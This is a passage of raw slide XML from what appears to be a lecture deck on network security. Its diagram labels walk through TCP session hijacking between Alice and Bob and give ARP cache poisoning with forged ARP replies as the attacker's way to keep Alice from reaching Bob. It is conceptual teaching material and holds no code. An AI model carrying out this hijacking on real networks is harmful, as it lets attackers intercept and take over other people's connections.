              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s18499" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682"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4388" y="5505450"/>
                        <a:ext cx="869950" cy="741363"/>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8438" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3052763" y="3067050"/>
          <a:ext cx="868362" cy="741363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s18500" name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="1307079" imgH="1083682"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2763" y="3067050"/>
                        <a:ext cx="868362" cy="741363"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="18439" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4859338" y="2166938"/>
            <a:ext cx="2909887" cy="291465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8440" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3887788" y="3403600"/>
            <a:ext cx="1073150" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18441" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6330950" y="4810125"/>
            <a:ext cx="0" cy="738188"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339977" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6613525" y="3862388"/>
            <a:ext cx="1862138" cy="1544637"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339978" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-2289434">
            <a:off x="6689725" y="4597400"/>
            <a:ext cx="2228850" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>thanks bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2300">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18444" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2997200" y="3733800"/>
            <a:ext cx="914400"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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18445" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8826500" y="3852863"/>
            <a:ext cx="787400"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Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18446" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5664200" y="6096000"/>
            <a:ext cx="1365250"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Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3976688" y="3159125"/>
            <a:ext cx="4605337" cy="863600"/>
            <a:chOff x="1828" y="1394"/>
            <a:chExt cx="2040" cy="382"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18454" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3471" y="1541"/>
              <a:ext cx="397" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18455" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1828" y="1394"/>
              <a:ext cx="2001" cy="15"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18456" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2314" y="1422"/>
              <a:ext cx="1138" cy="354"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1. weird ACK # for </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>data never sent</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18448" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8659813" y="2114550"/>
            <a:ext cx="263525" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2300">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4064000" y="1676400"/>
            <a:ext cx="4570413" cy="1233488"/>
            <a:chOff x="1867" y="737"/>
            <a:chExt cx="2024" cy="546"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18452" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1867" y="1283"/>
              <a:ext cx="2024" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18453" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2308" y="737"/>
              <a:ext cx="1236" cy="532"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2. to</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2600">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>resync, Alice</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>sends segment with</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>correct seq #</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339990" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="6172200"/>
            <a:ext cx="4287838" cy="2716213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bob is getting segments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Alice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Source IP address same,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>but seq #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s different. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bob likely drops </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>connection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339991" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7519988" y="5715000"/>
            <a:ext cx="5484812" cy="3702050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2300" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stop Alice from communicating with Bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Poison the ARP Cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" lvl="1" indent="-157163" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Send unsolicited ARP replies  to Alice and Bob with non-existent  MAC addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" lvl="1" indent="-157163" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Overwrite IP-to-MAC ARP tables so Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s segments will not reach Bob </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and vice-versa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" lvl="1" indent="-157163" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But attacker continues to hear Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>segments, communicates with Bob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="339933"/>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997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997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999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99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77" grpId="0" animBg="1"/>
      <p:bldP spid="339978" grpId="0"/>
      <p:bldP spid="339990" grpId="0"/>
      <p:bldP spid="33999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a:xfrm>
            <a:off x="1701800" y="2057400"/>
            <a:ext cx="10744200" cy="5997430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
